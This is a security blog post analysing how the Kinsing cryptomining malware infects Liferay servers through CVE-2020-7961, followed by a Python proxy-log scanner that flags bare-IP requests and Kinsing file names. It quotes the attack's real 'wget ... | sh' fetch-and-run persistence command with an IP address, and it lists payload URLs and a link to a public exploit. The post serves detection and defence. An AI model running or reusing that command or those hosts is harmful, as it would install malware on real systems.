Kinsing cryptocurrency mining malware (TTPs & IOC)

blog.redteam.pl, 4 years ago
We would like to share with the community the following TTPs and IOC related to the Kinsing cryptocurrency mining malware, as most investigations focus directly on analysing the malware samples rather than on how the malware infects the system.

TTPs

Attackers are exploiting an RCE vulnerability in Liferay identified as CVE-2020-7961 [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7961]. There is a publicly available PoC for this vulnerability on GitHub [https://github.com/mzer0one/CVE-2020-7961-POC/blob/master/poc.py], which matched most of the artifacts we found on the targeted system.

Attackers send the payload in an HTTP POST request:

POST /api/jsonws/invoke

After successful exploitation, the following request is sent to retrieve the malicious code:

GET http://X.X.X.X/LifExp.class

We found that IPv4 addresses are mostly used for communication (domain names were not used in the HTTP requests, only bare IP addresses). If you have a proxy server, it is fairly easy to monitor its logs for requests whose host is a bare IP address, e.g. with regular expressions.

After LifExp.class is downloaded, two additional files are requested: the malware binary (kinsing2) and a bash script (lf.sh). Finding these files on a host indicates that the system has been infected.

Decompiled code of the Java class (LifExp.class):

https://gist.github.com/adamziaja/6d56e9c5e3b943e08cd476c6ac9deda6

Content of the malicious bash script (lf.sh):

https://gist.github.com/adamziaja/b0b1a48d9b8db8dcea9777244817b793

In summary, the malicious bash script mainly removes other mining malware from the system and sets up persistence using crontab [https://attack.mitre.org/techniques/T1168/]:

wget -q -O - http://195.3.146.118/lf.sh | sh > /dev/null 2>&1

Please note that the name of the malicious script (in this case lf.sh) is "random", as is the username in the Bitbucket request:

https://bitbucket.org/sam3cr12/git/raw/master/kinsing
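The proxy-log check suggested above, combined with the file names from the infection chain (LifExp.class, kinsing2, lf.sh), as an added example that is not part of the original post. It assumes Squid's native access-log format (method in the 6th field, URL in the 7th) and uses constructed sample lines with documentation-range IP addresses, not the real indicators.

```python
import re
from urllib.parse import urlparse

# Files requested in the Kinsing infection chain described above.
KINSING_PATHS = {"/LifExp.class", "/kinsing", "/kinsing2", "/lf.sh"}
BARE_IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")

# Constructed sample lines in Squid's native access-log format (assumption):
#   time elapsed client code/status bytes method URL ident hierarchy type
# The IP addresses are documentation ranges, not real indicators.
SAMPLE_LOG = """\
1588000000.123    120 10.0.0.5 TCP_MISS/200 2048 GET http://www.example.com/index.html - HIER_DIRECT/192.0.2.1 text/html
1588000001.456     80 10.0.0.5 TCP_MISS/200 5120 GET http://203.0.113.10/LifExp.class - HIER_DIRECT/203.0.113.10 application/octet-stream
1588000002.789     60 10.0.0.5 TCP_MISS/200 910 GET http://203.0.113.10/lf.sh - HIER_DIRECT/203.0.113.10 text/plain
1588000003.000    400 10.0.0.7 TCP_MISS/200 12345 GET http://198.51.100.9/update.bin - HIER_DIRECT/198.51.100.9 application/octet-stream
"""


def classify(line):
    """Return (reason, client, url) for a suspicious request, or None."""
    fields = line.split()
    if len(fields) < 7:
        return None  # not a complete Squid native log line
    client, method, url = fields[2], fields[5], fields[6]
    if method == "CONNECT":
        # CONNECT lines carry host:port instead of a full URL.
        host, path = url.rsplit(":", 1)[0], ""
    else:
        parsed = urlparse(url)
        host, path = parsed.hostname or "", parsed.path
    if not BARE_IPV4.match(host):
        return None  # hostname-based request: not the pattern seen with Kinsing
    if path in KINSING_PATHS:
        return ("kinsing-stage-fetch", client, url)
    return ("bare-ip-request", client, url)


def scan(lines):
    """Scan an iterable of log lines and return the suspicious ones in order."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for reason, client, url in scan(SAMPLE_LOG.splitlines()):
        print(f"{reason:20s} {client:12s} {url}")
```

A bare-IP request alone is only a lead; the stage-fetch reason combines it with a file name from this campaign and is the hit worth triaging first.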

IOC
